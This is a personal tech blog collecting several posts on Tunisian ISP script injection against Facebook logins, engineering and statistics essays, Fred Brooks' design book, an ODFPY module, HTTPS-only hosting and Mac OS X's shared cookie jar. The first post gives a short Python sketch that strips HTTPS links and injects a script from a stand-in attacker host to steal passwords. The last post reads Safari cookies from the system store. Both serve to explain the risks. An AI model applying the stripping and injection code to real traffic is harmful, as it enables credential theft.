Interesting article about how Tunisia started keylogging passwords for anybody logging in to Facebook through a Tunisian ISP. The article praises Facebook for implementing countermeasures, but really Facebook is just stupid for not using SSL to begin with, especially given the existence of Firesheep, which lets you trivially hijack unencrypted browsing sessions on unsecured Wi-Fi networks.
The article doesn't go into the technical details, but according to this page, the Tunisian government was getting ISPs to inject a script into the login page that stole the password before the login form was submitted. So even though the form submission itself was encrypted, they were still able to grab the password. Facebook's response was to serve the page containing the login form over HTTPS, so that the ISPs couldn't inject the script. That stopped the Tunisian government, but not because the underlying hole is closed. Facebook is still vulnerable to exactly the same attack, because an ISP can simply rewrite the pages that link to the login page to use http links instead of https. In fact, if you access any insecure page on the domain, the ISP can pretty much rewrite all the links to keep you insecure, and the average user would never know that their data was being snatched.
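To make that concrete, here's a minimal sketch (in Python, with a made-up attacker URL) of the kind of rewriting an ISP sitting in the middle of your unencrypted traffic could do. It's an illustration of the idea, not the actual Tunisian script:

```python
# Hypothetical sketch of SSL-stripping plus script injection. An ISP in the
# middle of unencrypted traffic can transform any http:// page it serves you,
# so a "secure" login link never stays secure.
import re

def strip_and_inject(html: str) -> str:
    # Downgrade every https:// link to http://, so the victim's browser
    # never actually reaches the encrypted login page.
    html = re.sub(r'https://', 'http://', html)
    # While we're in there, injecting a password-stealing script is just as
    # easy; attacker.example is a made-up host for illustration.
    return html.replace(
        '</head>',
        '<script src="http://attacker.example/steal.js"></script></head>')

page = '<head></head><a href="https://www.facebook.com/login.php">Log in</a>'
print(strip_and_inject(page))
```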
(On a related note, this sort of attack is exactly why my site forces you to type the https URL directly into the address bar.)
[ 0 Comments... ]
[This blog post is an extension of part of the presentation I gave in class a few days ago.]
There's no one true definition of engineering, but a lot of the definitions you'll find are variants on the same theme: an engineering discipline consists of the application of a science to solve a problem. The problem with all of these definitions is that they downplay the "application" part - that is, the human component of engineering.
The way I see it, engineering is a combination of two main factors. One is the principles and properties from the underlying science. The other is the mind of the human putting the principles and properties together. Different engineering disciplines have different amounts of these two factors, and that has all sorts of implications.
It's probably easier to see with an example. Let's say we stumble through a wormhole into a different universe where our current rules of physics don't apply. Naturally we start a new scientific discipline dedicated to figuring out how that universe operates. After some investigation, we discover three laws. Law one is "if two objects collide, their masses automatically double". Law two is "if an object reaches a mass of 100kg or greater, it splits into three equal pieces". Law three is "if you have an object of 64kg, it turns into a wormhole that sucks you back to our normal universe". Now, you want to return to our normal universe, so you grab all the rocks you can find and weigh them. You find that you have three rocks with masses 1kg, 32kg and 96kg.
The science in this alternate universe provides us with three laws. As engineers, we have different ways in which we can combine these laws to solve a problem (getting home). For example, we could collide the 1kg and 32kg rocks together, resulting in 2kg and 64kg rocks. We could then use the 64kg rock to get home. Or we could collide the 1kg and 96kg rocks together, resulting in 2kg and 192kg rocks. The 192kg rock would then split into three 64kg rocks, any of which we could use to get home. Or we could collide the 32kg and 96kg rocks, which would also get us home. So with these three rocks, given our stated goal, there are three distinct solutions. If we sent a bunch of engineers over to this alternate universe, it is highly unlikely that they would all use the same solution to get back.
If you view an engineering discipline as a combination of a science and a human mind, then it makes sense to try to figure out how much of the engineering is the science and how much is the human component. With the example above, for that one problem, both the science and the solution space are bounded: there are only three laws in the science, and only three solutions. But if we added another 1kg rock, there would be 31 different solutions instead of just three. In that scenario, the solution that actually gets selected is determined more by the human mind than by the science. On the other hand, if you started out with two rocks of 32kg each, there would be only one possible solution to the problem. In that case, the human component plays a negligible role and the science plays a much bigger role in the engineering solution.
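If you want to play with this, here's a rough brute-force sketch of the alternate-universe rules in Python. How many solutions you count depends on how deep you search and what you treat as a distinct solution, so the numbers are illustrative rather than definitive:

```python
from itertools import combinations

def apply_split_law(masses):
    # Law two: any object of 100kg or more splits into three equal pieces
    # (re-applied until nothing is left to split).
    masses = list(masses)
    while any(m >= 100 for m in masses):
        m = next(m for m in masses if m >= 100)
        masses.remove(m)
        masses.extend([m / 3] * 3)
    return tuple(sorted(masses))

def solutions(masses, depth=3):
    # Enumerate sequences of collisions that produce a 64kg rock (law three).
    masses = tuple(sorted(masses))
    if 64 in masses:
        return [[]]  # already have a wormhole rock; nothing more to do
    if depth == 0:
        return []
    found = []
    for i, j in combinations(range(len(masses)), 2):
        rest = [m for k, m in enumerate(masses) if k not in (i, j)]
        # Law one: colliding two objects doubles both of their masses.
        after = apply_split_law(rest + [masses[i] * 2, masses[j] * 2])
        for tail in solutions(after, depth - 1):
            found.append([(masses[i], masses[j])] + tail)
    return found

print(solutions([1, 32, 96]))  # the three one-collision solutions from above
```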
If we take this a step further, and look at the space of all possible problems that can be solved in this universe, and aggregate the science/human ratio over them all, we can figure out how much of the overall engineering discipline depends on the science and how much depends on the human component. (Note: I don't actually know what metrics and aggregation operations would be best to use here. I'm just doing thought experiments.)
So where does this take us? Well, different engineering disciplines are going to have different science/human ratios, based on what kinds of problems they deal with and what properties the underlying science has. I think that the greater the human component, the more "complex" we consider the engineering discipline to be. Software engineering, in particular, has a huge number of possible solutions to any problem, and I think that's related to why it is so complex. The human variable in any software engineering project has a huge impact on how the final solution turns out. This is why I claimed in my previous post on experimentation that the human mind is such a HUGE variable in any software program, and that any experiment that leaves this variable uncontrolled produces nonsense results.
[ 0 Comments... ]
[This blog post is adapted from part of a presentation I gave in class a few days ago, on a topic I've been thinking about for a while.]
Recently there was a big brouhaha over some research by Dr. Bem at Cornell. He's a psychologist who ran a series of experiments, and 8 out of 9 of them showed evidence that precognition is possible. He's a respected researcher, the paper was peer-reviewed, and it's scheduled to be published soon in a prominent journal. A lot of people disagree with his conclusions, for obvious reasons, and there's been a lot of discussion about how to interpret his results and whether his methodology or analysis was flawed or biased. I particularly like this rebuttal (PDF) of his approach.
Another example of a similar nature is the book Good Calories, Bad Calories, which I was reading not too long ago (but didn't finish). It looks at a lot of studies in the field of nutrition and rips many of them apart. Many of these studies are not reproducible, or even contradict each other, and often have conclusions that are not supported by the data.
The point I'm trying to make is that when it comes to using statistics to analyze data, there is almost no consensus on how to do it correctly, despite the fact that we've been doing it for decades. It's pretty absurd, if you ask me. There are all sorts of pitfalls that people regularly fall into, such as Simpson's Paradox, simply because it's unclear which of the variables that were changed in the experiment are relevant to the outcome and which are not.
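To see how badly this can go wrong, here's a small illustration of Simpson's Paradox with hypothetical numbers (loosely modeled on the classic kidney-stone studies): one treatment does better in every subgroup, yet looks worse once the subgroups are naively merged, because the grouping variable was ignored.

```python
# Hypothetical numbers illustrating Simpson's Paradox: treatment A wins within
# every severity subgroup, yet appears to lose in the naive aggregate.
groups = {
    # severity -> treatment -> (successes, trials)
    "mild":   {"A": (81, 87),   "B": (234, 270)},
    "severe": {"A": (192, 263), "B": (55, 80)},
}

for severity, by_treatment in groups.items():
    for treatment, (ok, n) in by_treatment.items():
        print(f"{severity:6} {treatment}: {ok / n:.0%}")   # A wins both groups

for treatment in ("A", "B"):
    ok = sum(groups[g][treatment][0] for g in groups)
    n = sum(groups[g][treatment][1] for g in groups)
    print(f"overall {treatment}: {ok / n:.0%}")            # ...but "loses" overall
```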
Take a simple example - that of the boiling point of water. The value of the boiling point is a function of a number of factors, like the atmospheric pressure and salinity of the water. However, it's not a function of other things, such as the heat source that's used to heat up the water. If you aren't aware of which variables affect the results and which do not, you might do something like run a few trials at sea level and run a few trials on top of a mountain, and then average (or more generally, statistically analyze) the results to get a final answer.
But of course, if you average measurements taken at different atmospheric pressures, you get a value that's garbage. It reflects neither the boiling point at sea level nor the boiling point on the mountain. It's the boiling point at some pressure in between, but only because the boiling point is a monotonic function of pressure. If it were some other kind of function, the average would truly be a nonsense number, even though it looks like a real result.
This is a trivial example and has very few variables. But a lot of the sciences that deal with human subjects do this all the time. Examples abound in psychology, medicine, nutrition, and of course, software engineering. For example, consider the classic software experiment to find out if technology A is better than technology B. You get a bunch of programmers, make sure they are trained equally on A and B, and have them sit down and do a task. Then you average the results from A and average the results from B and compare the two, and conclude that A (or B) is better. But the huge flaw in any experiment of this kind is that the thing you're measuring (the final code produced) is a function of both the technology (A or B) and the mind of the programmer. And the programmer's mind is a HUGE variable, a function of all sorts of things like education and experience and social influence and genetics.
In the boiling water example, it doesn't make sense to average two measurements from different pressures. Instead, it's better to state the result as a function that takes pressure as input and returns the boiling point as the output. Similarly, I think that for the software experiments, it doesn't make sense to just average the results from different programmers. Instead, a better (although currently infeasible) approach would be to represent the programmer as a vector of traits, and to give a function that takes as input such a vector and returns as output whether A or B is better. The vector would have to include every trait that we determine to be relevant to the software engineering process (that is, whether it affects the code that programmers write), so determining exactly what traits should be included is probably impossible. However, if even a few of the main traits can be isolated, we can start getting results that approximate something meaningful, rather than just being nonsense that looks like a real result.
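To make the contrast concrete, here's a toy sketch in Python. The trait names and the decision rule are entirely made up for illustration; the point is only the shape of the answer, a function of the programmer rather than a single averaged number:

```python
# Toy sketch: report the experiment's outcome as a function of the programmer,
# not as an average over programmers. The traits and the rule are made up.
from typing import Dict

def better_technology(programmer: Dict[str, float]) -> str:
    """Return 'A' or 'B' given a vector of (hypothetical) relevant traits."""
    years = programmer["years_experience"]
    functional_background = programmer["functional_background"]  # 0.0 - 1.0
    # Made-up rule: imagine B only pays off for people already steeped in
    # functional programming; everyone else does better with A.
    if functional_background > 0.5 and years >= 2:
        return "B"
    return "A"

print(better_technology({"years_experience": 5, "functional_background": 0.9}))  # B
print(better_technology({"years_experience": 1, "functional_background": 0.1}))  # A
```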
[ 0 Comments... ]
I had a dream last night, where the PlayBook came out, and instead of being a 7-inch tablet, it was a larger (~11-inch) semi-flexible screen. Now that would be cool.
[ 1 Comment... ]
A few final notes on The Design of Design. In Chapter 10, Brooks talks about the "budgeted resource" (i.e. the resource that is the most constrained) when designing something. One of the things he mentions here is the use of "surrogates" - something that is measured as an approximation of the actual budgeted resource, because the actual resource is hard to measure directly. This is basically what I called an "indicator" in an earlier post; he makes the same point I did, but I like the way he says it better. I also like the word "surrogate" more than "indicator", since its connotations are more in line with the idea it expresses.
In Chapter 11, on constraints, he talks about how adding constraints can help narrow the scope of a project and make it easier to come up with a good design. He specifically cites programming language design as an example - a special-purpose language is easier to design well than a general-purpose language. This reminded me of an article on language-oriented programming that I read a while ago. The article claims that LOP allows the programmer more freedom of expression, which makes sense: since LOP lets the programmer express their mental model with less loss, it allows for a better design and implementation. (This ties into yesterday's post on mental models.)
Another interesting point in the book is in Chapter 15, where he talks about how disciplines have become increasingly specialized, resulting in a greater separation between design, implementation, and use. As an example, he cites how Henry Ford built his own car, but today no computer engineer can physically make his own chips. I think this same thing happens on a smaller scale for individual products as well. When I first worked at RIM as a co-op in 2003, all the employees had a BlackBerry, and used the devices extensively. The designers and implementers were also users, and the process of dogfooding was one of the reasons the devices worked so well.
Today, all the employees still have and use their devices, but something has changed. Specifically, the user market RIM is targeting is no longer the same, so the employees are no longer representative of the user population. Dogfooding still helps, but not nearly as much as it used to, since the features users care about the most are not necessarily the features that get exercised the most internally. This has practical, noticeable consequences. Because RIM's development culture grew up relying on dogfooding to ensure quality, it never developed a strong culture of other forms of quality control, such as automated testing. This has led to a gradual decline in overall device quality, something a lot of people have been complaining about lately. The good news is that it's not hard to fix - they just have to rely less on dogfooding and invest in other, more robust methods of quality control (which is something they're already doing).
In general, I think this is a problem for most software projects that follow the Bazaar model of software development. The first guideline put forward by Raymond in his essay is that "every good work of software starts by scratching a developer's personal itch". I don't know if that's always true, but I think that as any such software grows, it will reach a point where it has features not really used by the developer. This also results in a "progressive divorce of the designer from ... the user", as Brooks puts it. Therefore projects that grow past this point have to face the same issues of miscommunication that Brooks talks about in this section.
In Chapter 16, Brooks mentions in passing that "complete modularity also has drawbacks ... optimized designs have components that achieve multiple goals." It occurred to me when reading this that there is a distinction between modular goals and modular components. A component that satisfies multiple goals is good, but a goal that is satisfied by multiple components is bad. He seems to define "complete modularity" as a one-to-one mapping between goals and components, whereas I would just define it as components that don't interact with each other. It might just be a semantic definition issue, but it's something to think more about.
Anyway, that's all I have. It's a pretty thought-provoking book, and full of lots of good advice and insight, so if you're interested in designing stuff, I definitely recommend reading it.
[ 0 Comments... ]
This post is about conceptual integrity and mental models. I've mentioned this topic before, but in the years since I've come to appreciate much more just how important it is. Brooks talks about conceptual integrity in Chapter 6 of The Design of Design, in the context of collaboration and teamwork. He says that "the solo designer or artist usually produces works with this integrity subconsciously; he tends to make each microdecision the same way each time he encounters it" and that this results in a distinctive design style and conceptual integrity.
I hadn't really thought about this aspect of it before reading this book, but it makes perfect sense, because the best designs are simply expressions of a mental model held by somebody. It starts when the designer has a model that is simple enough to hold entirely in her head. To make this possible, a lot of the details have to be omitted from the mental model; what is imagined is the simplified essence of the design. That mental model is then used to generate the design, with the details being resolved as the design is created. The details are basically the microdecisions that Brooks refers to in the quote above. Each detail is resolved so that it is aligned with the overall goal of the project and with the mental model.
Note that being able to hold the complete model in your head is essential for this. If the mental model is not simple enough, then the details will get resolved while only considering a subset of the model, and not the entire project. This results in microdecisions that are not perfectly aligned with the goals of the project, inconsistent style, and finally, a poor design.
In the context of team design, the mental model must be shared by all members of the team in order for the design to maintain a consistent style and remain coherent. I'm pretty sure this is impossible to do perfectly. In teams of more than two people, the differences between mental models are easily noticeable. Teams of two are something of a special case - I still think their mental models are not perfectly consistent, but the divergence is much harder to detect. Brooks has a section in the book titled "Two-Person Teams Are Magical" which describes how the interaction between the members of a two-person team can lead to a synchronization of effort and mental models. I think that makes sense, but only for as long as the two people are working together and freely exchanging ideas. As soon as they separate and start thinking about the model apart from one another, their mental models begin to diverge again and the coherence becomes harder to maintain.
One of the reasons for this is that transferring a mental model from one person to another is always lossy (at least with current non-telepathic communication channels). If you think about it, this transmission of mental models is something we've been trying to perfect for millennia - transferring a mental model from teacher to student is the essence of teaching in any domain. The reason it works better in a two-person team than in a three-person (or larger) team is basically a matter of psychology. If you are brainstorming and trying to explain your ideas to a number of listeners, and one of those listeners understands before the others do, you will tend to favor communication with that listener over the rest. This results in the other listeners being "left behind" as the brainstorming proceeds. In a two-person team, there are no other listeners to be left behind, so this situation doesn't arise. There's probably a whole raft of other human psychology factors that come into play here, but I'm pretty sure the majority of them favor coherence in two-person teams over larger ones.
As an aside, Brooks also says that "any product ... must nevertheless be conceptually coherent to the single mind of the user." This is another point that I didn't pay much attention to before, but that illustrates exactly why a divide-and-conquer approach doesn't result in user-friendly designs. That is, if you have a team of designers, and each of them handles the design for a separate component of the project rather than sharing the same mental model, then each component will have conceptual integrity within itself, but the project as a whole will lack it. This means a user, who needs to use the entire system, will have to replicate the models from each member of the design team, which is much harder to do.
This last point reminds me of the git user manual, currently the single best piece of documentation I have ever read. Very few other tutorials on git (or any other RCS, or any other system, for that matter) try to help the user build a mental model of what is happening under the covers. They mostly give the user a bunch of commands for specific tasks (e.g. creating a new code branch) and expect them to figure out the rest.
The git manual, on the other hand, has a section on "Understanding history" early on, which lets the user start building a mental model of what git is doing. The rest of the manual then explains the git commands in terms of that mental model, so that git becomes perfectly predictable and completely intuitive to the user. By "the user" here I really mean "me", since this is what happened when I read the manual. Literally overnight, I went from being a git n00b to being completely unafraid of git and able to carry out any operation I wanted. If you haven't read the git user manual, and especially if you've never used git before, I strongly suggest you do so. I'm curious to see if it works the same for others as it did for me.
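For flavour, here's a toy sketch in Python (a model of the idea, not of git's actual implementation) of the picture the manual builds up: history is a DAG of commits, and a branch is nothing but a movable name pointing at a commit.

```python
# Toy model of the git mental model: commits are immutable records pointing at
# their parents, and a branch is just a named pointer that gets moved around.
import hashlib

commits = {}   # commit id -> (message, parent ids)
branches = {}  # branch name -> commit id

def commit(message, branch):
    parent = branches.get(branch)
    cid = hashlib.sha1(f"{message}{parent}".encode()).hexdigest()[:7]
    commits[cid] = (message, [parent] if parent else [])
    branches[branch] = cid  # "committing" just advances the branch pointer
    return cid

def log(branch):
    cid = branches[branch]
    while cid:
        message, parents = commits[cid]
        print(cid, message)
        cid = parents[0] if parents else None

commit("initial commit", "master")
commit("add feature", "master")
branches["experiment"] = branches["master"]  # branching is just copying a pointer
commit("try something risky", "experiment")
log("experiment")
```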
I'm convinced that Linus Torvalds had the kind of mental model I'm talking about when he designed git, and that is the reason why the design is so coherent. Since he was also the one who wrote the original version of the user manual, it's no surprise that it allows the reader to (approximately) re-create that original mental model and use that to understand git operations. I'm also convinced that the design coherence and simplicity of git, a direct result of the mental model Torvalds had, is the reason git is so widely popular today, despite alternatives that arguably offer more features with no significant disadvantage.
[ 0 Comments... ]
I recently read The Design of Design, a book by Fred Brooks (he of The Mythical Man-Month). It was pretty interesting, and I would recommend it to any designer in the computer industry. Although Brooks tries to abstract the design concepts away from specific domains, a lot of his examples are from software/hardware, so people working in other domains might find it harder to follow. There are also some case studies near the end of the book that look at design projects in other domains, such as home renovations and book writing, but I didn't find the case studies all that useful anyway. As I was reading, I had some thoughts about things he said; this is the first in a series of posts on the topic.
(Warning: this post turned out to be more rambling than I expected, since I didn't really have a clear point to make. But composing this post helped me think about this stuff more clearly, so I'm going to post it anyway instead of just deleting it.)
In Chapter 4, he talks about how, because of imperfect communication and human "sins", we need to create contracts that identify the deliverables and lock down requirements and constraints. In software, the problem is usually that the contracts are created too early, before a full understanding of the project and its design can be reached. This is partly because with software, it's often hard to tell where the design stops and the implementation starts. However, when I think about my own experiences, I've noticed there's usually a point where I know I've hammered out all the unknowns for a particular component - I have a fairly concrete idea of what I need to do, what data structures and algorithms I'm going to use, and the overall architecture of the code that I'm working on. Although I haven't considered all the details, and resolving those details may affect the component architecture I have in mind, it's highly unlikely that those details will cause a change in the overall design of the project. This is the point where I would consider the "design" done.
The problem is that this point occurs pretty late in the project. For one thing, I tend to favor top-down designs and work on components sequentially. Within each component, I would estimate that the "design is done" point occurs after 60%-70% of the total time I spend on the component. So if I have a project with four equal-sized components, with my usual programming style, I would only be finished with all the design work after completely finishing the first three components and finishing ~65% of the work on the fourth component. This would put me at ~91% done for the whole project. Even if I shifted things around and did all the design work for the components first, it would still take me 60%-70% of the total time spent on the project just to complete the design.
Now if the project is something I'm doing for my own needs, this isn't a problem. But in industry, the design might be one of the factors used in coming up with a time/cost estimate for the whole project. Taking ~65% of the total time to produce this estimate is a little unreasonable. But if that's how long the design takes, then that's how long it takes, and I can't think of a way around that. The other option for reducing estimation time is to find ways of coming up with an estimate that don't require a full design of the project. This is what often happens in industry now - estimates are based on the amount of time previous projects of similar scope took. What I'm afraid of is that by using these alternate estimation techniques, people might think there's no longer a need to do any design work* at all, and go straight to haphazardly attempting an implementation that will end up poorly designed.
* In this context, I'm using a specific meaning of the word "design" from the book - an interactive process that is used more for helping the customer discover the requirements than for helping the developer determine an implementation strategy. I guess this could largely be called "requirements elicitation" instead of "design work", but the former term doesn't cover everything the latter implies.
[ 0 Comments... ]
During the last school term, I was working on two different projects where I realized it would be really handy to be able to update cells in a spreadsheet from a script. That was the one step I had to perform manually in an otherwise fully scripted chain of commands.
I looked around for existing tools to do this, but unfortunately couldn't find any that did quite what I needed. So I grabbed the ODFPY library (the closest match for what I wanted), a Python language reference, and my trusty sidekick vim. A few hours later I had my first non-trivial chunk of Python code: a module on top of ODFPY to read and write arbitrary blocks of cells from and to an ODF spreadsheet. I also managed to fix an existing ODFPY bug along the way.
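For a sense of why a wrapper is worth having, here's roughly what writing a single cell looks like with the raw ODFPY API (from memory, so treat the details as approximate); the module's job is to hide this kind of boilerplate behind simple read/write-a-block-of-cells calls.

```python
# Rough sketch of writing one cell with the stock ODFPY API (illustrative,
# details from memory). The contrib module wraps this kind of boilerplate.
from odf.opendocument import OpenDocumentSpreadsheet
from odf.table import Table, TableRow, TableCell
from odf.text import P

doc = OpenDocumentSpreadsheet()
sheet = Table(name="Results")

row = TableRow()
cell = TableCell(valuetype="float", value=42)  # the cell's typed value
cell.addElement(P(text="42"))                  # and its displayed text
row.addElement(cell)
sheet.addElement(row)

doc.spreadsheet.addElement(sheet)
doc.save("results.ods")
```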
I submitted my patch and new module to Søren Roug, the author of ODFPY, and he agreed to include it as one of the contrib modules distributed with the library so others who find it useful can also use it and extend it as they need.
Just another example that shows how open standards (i.e. ODF) and free/open-source software (i.e. ODFPY) empower users.
And speaking of open systems, I really like the design and flexibility of the ContactsContract API in Android. Creating a sync adapter to inject contact information from custom sources is pretty simple and works more or less how I'd expect it to. I just wish the high-level documentation were a bit better; that would have saved me some time. The same goes for the Android Account API - it looks flexible and well-designed but the package-level documentation is kind of hard to follow.
[ 0 Comments... ]
I've moved my website from its previous home at stakface.com to staktrace.com. I've also switched from BlueHost, whose level of service has been declining significantly for a while now, to DreamHost, which seems to be much better. In addition, all pages on this site are now served over HTTPS. If you try to access any URL on this domain via HTTP instead of HTTPS, you'll get an error page telling you to use an HTTPS URL. As that page explains, auto-redirecting to HTTPS is still vulnerable to certain classes of man-in-the-middle attacks, so I prefer the approach where you have to fix your URL manually and learn not to do it again.
For the most part everything here should work as it did before, but let me know if you run into any problems, either by commenting on this post or via the contact form. If you have any links/bookmarks/RSS readers pointing to the old site, you should update them to point to the new site; just replace "http://stakface.com" with "https://staktrace.com" and leave the rest of the URL the same.
[ 0 Comments... ]
So I decided to try implementing the cookie thing I posted about a few days ago. I grabbed a git clone of the WebKit source and built it on my Mac. After poking around for a bit, I found the relevant cookie jar code for the Mac platform. It turns out the cookies are actually stored in a system-global singleton cookie jar on Mac OS X (Documentation link).
Well, that's kind of weird and unexpected. Does that mean every app running on my machine has access to my Safari cookies? Let's see... So I wrote a quick Objective-C test app to access the sharedHTTPCookieStorage, and sure enough, I could read out cookies that were set from Safari.
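For reference, here's an equivalent sketch using PyObjC rather than Objective-C (assuming the pyobjc bindings are installed; my actual test app was written in Objective-C, but it boils down to the same few calls):

```python
# Sketch: read the system-global shared cookie jar from Python via PyObjC.
# Requires the pyobjc bindings; the original test app did this in Objective-C.
from Foundation import NSHTTPCookieStorage

storage = NSHTTPCookieStorage.sharedHTTPCookieStorage()
for cookie in storage.cookies():
    # Any app with access to this singleton can see cookies set by Safari.
    print(cookie.domain(), cookie.name(), cookie.value())
```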
I'm not sure this is a security hole per se, since all apps running on my machine are supposed to be trusted; anything malicious running there can do worse than steal cookies. Still, it seems like a rather odd design decision to me. I guess it makes sense if you want a more unified experience across all the apps on your platform. It's interesting to note, however, that on iOS the cookies are not shared across applications. Maybe Apple decided the potential cost wasn't worth the benefit?
Anyway, since I can't trivially change the WebKit cookie jar code, at least on the Mac platform, I guess it's time to dive into Mozilla instead...
[ 0 Comments... ]